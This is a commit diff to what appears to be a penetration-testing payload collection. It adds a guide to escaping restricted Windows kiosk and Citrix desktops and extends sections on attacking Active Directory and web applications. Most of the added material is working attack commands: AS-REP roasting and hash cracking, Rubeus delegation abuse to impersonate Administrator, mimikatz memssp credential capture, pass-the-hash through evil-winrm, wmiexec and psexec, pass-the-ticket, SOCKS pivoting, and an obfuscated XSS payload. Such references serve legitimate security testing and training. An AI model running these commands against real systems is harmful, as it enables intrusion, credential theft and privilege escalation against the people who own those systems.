Application Escape and Breakout

This commit is contained in:
Swissky 2020-12-17 08:56:58 +01:00
parent 973f091d1b
commit f7e8f515a5
6 changed files with 171 additions and 10 deletions

View file

@ -1126,7 +1126,7 @@ Mitigations:
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
Prerequisite: Prerequisite:
- Accounts have to have **DONT_REQ_PREAUTH** - Accounts have to have **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`)
```powershell ```powershell
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
@ -1178,6 +1178,7 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r
# crack AS_REP messages # crack AS_REP messages
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
root@windows:hashcat$ hashcat64.exe -m 18200 '<AS_REP-hash>' -a 0 c:\wordlists\rockyou.txt
``` ```
Mitigations: Mitigations:
@ -1806,9 +1807,9 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
5. Use Rubeus to get hash from password 5. Use Rubeus to get hash from password
```powershell ```powershell
Rubeus.exe hash /password:'Weakest123*' /user:swktest /domain:factory.lan Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan
[*] Input password : Weakest123* [*] Input password : Weakest123*
[*] Input username : swktest [*] Input username : swktest$
[*] Input domain : factory.lan [*] Input domain : factory.lan
[*] Salt : FACTORY.LANswktest [*] Salt : FACTORY.LANswktest
[*] rc4_hmac : F8E064CA98539B735600714A1F1907DD [*] rc4_hmac : F8E064CA98539B735600714A1F1907DD
@ -1821,6 +1822,7 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
```powershell ```powershell
.\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
.\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan' [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan'
[*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5) [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5)

View file

@ -0,0 +1,111 @@
# Application Escape and Breakout
## Summary
* [Gaining a command shell](#gaining-a-command-shell)
* [Sticky Keys](#explorer---sticky-keys)
* [Dialog Boxes](#dialog-boxes)
* [Creating new files](#creating-new-files)
* [Open a new Windows Explorer instance](#open-a-new-windows-explorer-instance)
* [Exploring Context Menus](#exploring-context-menus)
* [Save as](#save-as)
* [Input Boxes](#input-boxes)
* [Bypass file restrictions](#bypass-file-restrictions)
* [Internet Explorer](#internet-explorer)
* [Shell URI Handlers](#shell-uri-handlers)
* [References](#references)
## Gaining a command shell
* **Shortcut**
* [Window] + [R] -> cmd
* [CTRL] + [ALT] + [SHIFT] -> Task Manager
* **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it
* **Drag-and-drop**: dragging and dropping any file onto the cmd.exe
* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe`
* **Task Manager**: `File` > `New Task (Run...)`
* **MSPAINT.exe**
* Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
* Zoom in to make the following tasks easier
* Using the colour picker, set pixels values to (from left to right):
* 1st: R: 10, G: 0, B: 0
* 2nd: R: 13, G: 10, B: 13
* 3rd: R: 100, G: 109, B: 99
* 4th: R: 120, G: 101, B: 46
* 5th: R: 0, G: 0, B: 101
* 6th: R: 0, G: 0, B: 0
* Save it as 24-bit Bitmap (*.bmp;*.dib)
* Change its extension from bmp to bat and run
## Sticky Keys
* Spawn the sticky keys dialog
* Via Shell URI : `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}`
* Hit 5 times [SHIFT]
* Visit "Ease of Access Center"
* You land on "Setup Sticky Keys", move up a level on "Ease of Access Center"
* Start the OSK (On-Screen-Keyboard)
* You can now use the keyboard shortcut (CTRL+N)
## Dialog Boxes
### Creating new files
* Batch files Right click > New > Text File > rename to .BAT (or .CMD) > edit > open
* Shortcuts Right click > New > Shortcut > `%WINDIR%\system32`
## Open a new Windows Explorer instance
* Right click any folder > select `Open in new window`
## Exploring Context Menus
* Right click any file/folder and explore context menus
* Clicking `Properties`, especially on shortcuts, can yield further access via `Open File Location`
### Save as
* "Save as" / "Open as" option
* "Print" feature selecting "print to file" option (XPS/PDF/etc)
* `\\127.0.0.1\c$\Windows\System32\` and execute `cmd.exe`
### Input Boxes
Many input boxes accept file paths; try all inputs with UNC paths such as `//attackerpc/` or `//127.0.0.1/c$` or `C:\`
### Bypass file restrictions
Enter *.* or *.exe or similar in `File name` box
## Internet Explorer
### Download and Run/Open
* Text files -> opened by Notepad
### Menus
* The address bar
* Search menus
* Help menus
* Print menus
* All other menus that provide dialog boxes
## Shell URI Handlers
* shell:DocumentsLibrary
* shell:Librariesshell:UserProfiles
* shell:Personal
* shell:SearchHomeFolder
* shell:System shell:NetworkPlacesFolder
* shell:SendTo
* shell:Common Administrative Tools
* shell:MyComputerFolder
* shell:InternetFolder
## References
* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)

View file

@ -138,7 +138,12 @@ or
# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0 # Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
run autoroute -s 192.168.15.0/24 run autoroute -s 192.168.15.0/24
use auxiliary/server/socks4a use auxiliary/server/socks_proxy
set SRVPORT 9090
set VERSION 4a
# or
use auxiliary/server/socks4a # (deprecated)
# Meterpreter list all active routes # Meterpreter list all active routes
run autoroute -p run autoroute -p
@ -152,6 +157,15 @@ route delete 192.168.14.0 255.255.255.0 3
route flush route flush
``` ```
## Empire
```powershell
(Empire) > socksproxyserver
(Empire) > use module management/invoke_socksproxy
(Empire) > set remoteHost 10.10.10.10
(Empire) > run
```
## sshuttle ## sshuttle
Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Transparent proxy server that works as a poor man's VPN. Forwards over ssh.

View file

@ -79,13 +79,13 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::logonpasswords
``` ```
- LSA is running as virtualized process (LSAISO) by Credential Guard - LSA is running as virtualized process (LSAISO) by **Credential Guard**
```powershell ```powershell
# Check if a process called lsaiso.exe exists on the running processes # Check if a process called lsaiso.exe exists on the running processes
tasklist |findstr lsaiso tasklist |findstr lsaiso
# If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data. # Lets inject our own malicious Security Support Provider into memory
#Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides # require mimilib.dll in the same folder
mimikatz # misc::memssp mimikatz # misc::memssp
# Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log # Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log

View file

@ -7,8 +7,8 @@
* [TIP 2 - Retail Credential](#tip-2-retail-credential) * [TIP 2 - Retail Credential](#tip-2-retail-credential)
* [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount) * [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount)
* [Metasploit](#metasploit) * [Metasploit](#metasploit)
* [Metasploit - SMB](#metasploit-smb) * [Metasploit - SMB](#metasploit---smb)
* [Metasploit - Psexec](#metasploit-psexec) * [Metasploit - Psexec](#metasploit---psexec)
* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) * [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
* [WinRM](#winrm) * [WinRM](#winrm)
* [Powershell Remoting](#powershell-remoting) * [Powershell Remoting](#powershell-remoting)
@ -20,6 +20,8 @@
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
* [Netuse](#netuse) * [Netuse](#netuse)
* [Runas](#runas) * [Runas](#runas)
* [Pass the Ticket](#pass-the-ticket)
* [SSH](#ssh)
## TIPS ## TIPS
@ -87,6 +89,7 @@ use exploit/windows/smb/psexec
set RHOST 10.2.0.3 set RHOST 10.2.0.3
set SMBUser username set SMBUser username
set SMBPass password set SMBPass password
set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
set PAYLOAD windows/meterpreter/bind_tcp set PAYLOAD windows/meterpreter/bind_tcp
run run
shell shell
@ -123,6 +126,7 @@ Require:
root@payload$ git clone https://github.com/Hackplayers/evil-winrm root@payload$ git clone https://github.com/Hackplayers/evil-winrm
root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
``` ```
or using a custom ruby code to interact with the WinRM service. or using a custom ruby code to interact with the WinRM service.
@ -190,7 +194,7 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca
## Psexec.py / Smbexec.py / Wmiexec.py ## Psexec.py / Smbexec.py / Wmiexec.py
from Impacket From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali)
```powershell ```powershell
root@payload$ git clone https://github.com/CoreSecurity/impacket.git root@payload$ git clone https://github.com/CoreSecurity/impacket.git
@ -204,6 +208,8 @@ root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10
# A semi-interactive shell, used through Windows Management Instrumentation. # A semi-interactive shell, used through Windows Management Instrumentation.
root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10 root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10
root@payload$ wmiexec.py domain.local/user@10.0.0.20 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79
# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. # A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints.
root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10 root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10
@ -289,6 +295,24 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe"
PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
``` ```
## Pass the Ticket
```powershell
python3 getTGT.py -hashes aad3b435b51404eeaad3b435b51404ee:B65039D1C0359FA797F88FF06296118F domain.local/user
[*] Saving ticket in user.ccache
cp user.ccache /tmp/krb5cc_0
export KRB5CCNAME=/tmp/krb5cc_0
klist
```
## SSH
:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash!
```ps1
cp user.ccache /tmp/krb5cc_1045
ssh -o GSSAPIAuthentication=yes user@domain.local -vv
```
## References ## References

View file

@ -49,6 +49,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Bypass ";" using another character](#bypass-using------using-another-character) - [Bypass ";" using another character](#bypass-using------using-another-character)
- [Bypass using HTML encoding](#bypass-using-html-encoding) - [Bypass using HTML encoding](#bypass-using-html-encoding)
- [Bypass using Katana](#bypass-using-katana) - [Bypass using Katana](#bypass-using-katana)
- [Bypass using Cuneiform](#bypass-using-cuneiform)
- [Bypass using Lontara](#bypass-using-lontara) - [Bypass using Lontara](#bypass-using-lontara)
- [Bypass using ECMAScript6](#bypass-using-ecmascript6) - [Bypass using ECMAScript6](#bypass-using-ecmascript6)
- [Bypass using Octal encoding](#bypass-using-octal-encoding) - [Bypass using Octal encoding](#bypass-using-octal-encoding)
@ -834,6 +835,15 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library.
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
``` ```
### Bypass using Cuneiform
```javascript
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
```
### Bypass using Lontara ### Bypass using Lontara
```javascript ```javascript